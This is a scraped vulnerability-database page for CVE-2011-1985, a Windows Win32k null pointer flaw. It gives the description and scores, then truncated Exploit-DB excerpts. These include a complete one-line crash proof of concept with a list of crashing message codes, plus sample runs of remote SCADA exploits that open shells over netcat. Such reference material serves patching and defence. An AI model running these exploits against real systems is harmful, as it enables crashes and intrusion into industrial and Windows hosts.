CVE-2011-1985
published 2011-10-12CVE-2011-1985: win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1…
PriorityP337high7.1CVSS 3.1
AVLACLPRLUINSUCHINAH
EXPLOIT
EPSS
2.39%
81.8th percentile
win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application, aka "Win32k Null Pointer De-reference Vulnerability."
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
CVSS provenance
nvdv3.17.1HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CoDeSys SCADA 2.3 - Remote Buffer Overflow
exploitdb·2011-12-01
CVE-2011-5007 CoDeSys SCADA 2.3 - Remote Buffer Overflow
CoDeSys SCADA 2.3 - Remote Buffer Overflow
---
/*
See Also: http://aluigi.altervista.org/adv/codesys_1-adv.txt
CoDeSys v2.3 Industrial Control System Development Software
Remote Buffer Overflow Exploit for CoDeSys Scada webserver
Author : Celil UNUVER, SignalSEC Labs
www.signalsec.com
Tested on WinXP SP1 EN
THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!
--snip--
root@bt:~# ./codesys 192.168.1.36
CoDeSys v2.3 webserver Remote Exploit
by SignalSEC Labs - www.signalsec.com
[+]Sending payload to SCADA system!
[+]Connecting to port 4444 to get shell!
192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.36] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\3S Software\CoDeSys V
Exploit-DB
Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077)
exploitdb·2011-10-23·CVSS 7.1
CVE-2011-1985 [HIGH] Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077)
Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077)
---
# Exploit Title: MS11-077 Win32k Null Pointer De-reference Vulnerability POC
# Date: 10/19/2011
# Author: KiDebug
# Version: Windows XP SP3 32bit
# Tested on: Windows XP SP3 32bit
# CVE : CVE-2011-1985
# Exploit Code. Only a single line of code can cause BSOD:
#include
void main()
{
SendMessageCallback((HWND)-1,CB_ADDSTRING,0,0,0,0);
}
or:
#include
void main()
{
SendNotifyMessage((HWND)-1,CB_ADDSTRING,0,0);
}
Those messages can aslo cause BSOD:
// CB_ADDSTRING 0x0143
// CB_INSERTSTRING 0x014A
// CB_FINDSTRING 0x014C
// CB_SELECTSTRING 0x014D
// CB_FINDSTRINGEXACT 0x0158
// LB_ADDSTRING 0x0180
// LB_INSERTSTRING 0x0181
// LB_SELECTSTRING 0x018C
// LB_FINDSTRING 0x018F
// LB_FINDSTRINGEXACT 0x01A2
// LB_INSERTSTRINGU
Exploit-DB
Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
exploitdb·2011-09-22
CVE-2011-3493 Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
---
#!/usr/bin/python
#
# Cogent Datahub > @net__ninja || @luigi_auriemma
# example usage:
# [mr_me@neptune cognet]$ ./cognet_overflow.py 192.168.114.130
#
# -----------------------------------------------------
# ------ Cogent Datahub Unicode Overflow Exploit ------
# ------------- Found by Luigi Auriemma ---------------
# --------- SYSTEM exploit by Steven Seeley -----------
#
# (+) Sending overflow...
# (+) Getting shell..
# Connection to 192.168.114.130 1337 port [tcp/menandmice-dns] succeeded!
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>whoami
# whoami
# nt authority\system
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaste
Exploit-DB
ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow
exploitdb·2011-09-12
CVE-2011-4535 ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow
ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow
---
[mr_me@neptune scadatec]$ php zip.php -t modbustagserver
[mr_me@neptune scadatec]$ nc -v 192.168.114.141 4444
Connection to 192.168.114.141 4444 port [tcp/krb524] succeeded!
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ScadaTEC\ModbusTagServer\Projects>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'The reason they call it the American Dream is because you have to be asleep
to believe it.' ~ George Carlin
*/
if ($argc
software: target software
Example:
php ".$argv[0]." -t scadaphone
php ".$argv[0]." -t modbustagserver
"); die; }
function setArgs($argv){
$_ARG = array();
foreach ($argv as $arg){
if (ereg("--([^=]+)=(.*)", $arg, $reg)){
$_ARG[$
http://www.securitytracker.com/id?1026165https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-077https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12935http://www.securitytracker.com/id?1026165https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-077https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12935
2011-10-12
Published